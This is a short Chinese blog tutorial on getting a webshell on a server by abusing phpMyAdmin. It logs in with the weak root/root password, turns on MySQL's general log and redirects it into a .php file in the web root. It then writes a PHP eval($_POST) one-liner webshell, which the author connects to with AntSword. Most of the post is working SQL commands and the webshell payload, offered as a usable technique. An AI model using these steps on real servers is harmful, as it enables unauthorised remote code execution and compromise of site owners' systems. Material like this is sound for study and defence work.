getshell之Phpmyadmin写日志

时间:2024-04-09 22:38:19

@MoCoCN

当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。

1.准备环境

一台装有Phpstudy(mysql>5.0)的服务器
中国蚁剑

2.开启phpstudy

getshell之Phpmyadmin写日志

3.访问服务器phpmyadmin页面

getshell之Phpmyadmin写日志

4.弱口令root root登录进去,点击SQL,执行sql语句getshell之Phpmyadmin写日志

查看数据库存放路径,然后根据数据库存放路径猜测网站的绝对路径

select @@datadir;
getshell之Phpmyadmin写日志这时我们可以看到数据库的路径为“C:\phpStudy\MySQL\data\”,由此我们可以推断网站的绝对路径为“C:\phpStudy\WWW\”

6.查看日志是否开启

show variables like ‘%general%’;

getshell之Phpmyadmin写日志此刻我们可以看到日志是关闭状态的,路径为C:\phpStudy\WWW\general_log_file。

7.手动开启日志

SET GLOBAL general_log=‘on’;

getshell之Phpmyadmin写日志
getshell之Phpmyadmin写日志

8.修改日志路径

set global general_log_file=‘C:\phpStudy\WWW\moco.php’;
getshell之Phpmyadmin写日志注意:这里一定要用\,或者使用/,不能使用\。

9.写入shell

select “<?php eval($_POST['moco']);?>”;

getshell之Phpmyadmin写日志

6.这时我们就可以通过蚁剑连接getshell了

getshell之Phpmyadmin写日志
getshell之Phpmyadmin写日志